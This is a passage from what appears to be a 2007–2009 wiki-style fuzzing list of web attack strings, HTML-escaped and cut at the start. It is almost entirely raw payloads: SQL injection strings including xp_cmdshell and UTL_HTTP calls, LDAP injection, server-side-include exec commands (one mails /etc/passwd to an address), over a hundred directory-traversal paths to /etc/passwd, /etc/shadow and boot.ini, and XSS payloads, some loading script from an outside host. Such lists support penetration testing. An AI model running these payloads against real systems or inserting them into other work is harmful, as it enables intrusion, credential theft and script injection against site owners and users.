or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
